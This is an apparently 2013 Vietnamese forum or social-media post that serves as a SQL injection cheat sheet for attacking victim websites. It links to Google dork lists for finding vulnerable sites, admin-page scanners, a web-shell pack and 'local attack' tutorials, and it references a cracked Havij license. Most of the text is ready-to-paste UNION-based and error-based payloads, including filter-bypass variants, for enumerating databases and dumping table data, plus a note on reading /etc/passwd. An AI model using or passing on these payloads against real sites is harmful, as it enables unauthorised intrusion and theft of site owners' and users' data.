++Các Dork tìm site lỗi SQL : kzic.net/5072/share-dork-google-sqli-cho-newbie.html +++Dork nước ngoài :andrepurnomosite.blogspot/2013/09/kumpulan-dork-sql-injection.html +++Dork Vn :kzic.net/4187/share-list-dorks-sqli-da-check.html ++Sear Ip : ip.kenh12/ +++Bẻ khóa File Win rar :archive.online-convert/convert-to-zip +++Scan link admin + MD5 :isoftwarez/scanner/index.php ++Name Haivij Name : [email protected] File : Bạn trỏ tới file HavijKey.lic ++Tìm mã Hex Table Encode Mã Hex Table~~~>convertstring/EncodeDecode/HexEncode Encode ~~~>Encode base64encode.org/ Decode ~~~>Decode base64decode.org/ ++Tut hack SQL căn bản sinhvienit.net/forum/tut-hack-sqli-injection-can-ban-cho-newbie-d.247389.html (TH id=null k dk thì id=-...) ++Khai thác Sql Bypass : kechocgian.blogspot/2013/02/mot-so-cach-bypass-sql-injection.html ------------------------------------- ***********Dạng /*!Union*/ /*!Select*/ : **Tìm Order lỗi :link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- - **Get Colum:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+mã hex table-- - **Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- - ----------------------------------------------------------------- **********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn: ***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- - ***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- - ***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- - ***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- - ***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- - ---------------------------------------------------------------- ***************Dạng Bypass = chặn + ẩn : ***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- - ***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- - ***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- - ***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- - ----------------------------------------------------------------- ***************Dạng Table ẩn (UnIoN SeLeCT): **Order lỗi : id=-... UNION SELECT 1,2,3,...-- - **Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ). **Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn ) **Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- - **Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- - ----------------------------------------- ****************XPath Injection(erro base) : 1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- - 2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- - 3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0xtable limit 0,1)))-- - 4.and extractvalue(rand(),concat(0x7c,(select concat(column,0x7c,column) from table limit 0,1)))-- - --------------------------------------------- ++Khai thác SQL = Erro Base demo-tainguyen.blogspot/2012/05/khai-thac-error-based-quick-blind.html ++Khai thác SQL Blind : ceh.vn/@4rum/showthread.php?tid=1203 ++less /etc/passwd less =cat =more. Bộ shell : mediafire/download/j45gkdrg0kndxn4/shell.rar Tìm link adm site root.vn/threads/admin-finder-phan-mem-tim-link-admin-hieu-qua.3400/ ++Dowload ~~>Học để Local Attack mediafire/download/l6oqm3wcv21rbit/TUT_hack_Local_Full.rar.001 mediafire/download/cit62s238on3ef5/TUT_hack_Local_Full.rar.002 TUT hack Local Full.rar.002 mediafire mediafire/download/8pqcc3i9du0arbo/TUT_hack_Local_Full.rar.003 mediafire/download/9v1tmc96sk0k3sl/TUT_hack_Local_Full.rar.004
Posted on: Sat, 26 Oct 2013 23:26:04 +0000
Trending Topics
Recently Viewed Topics
© 2015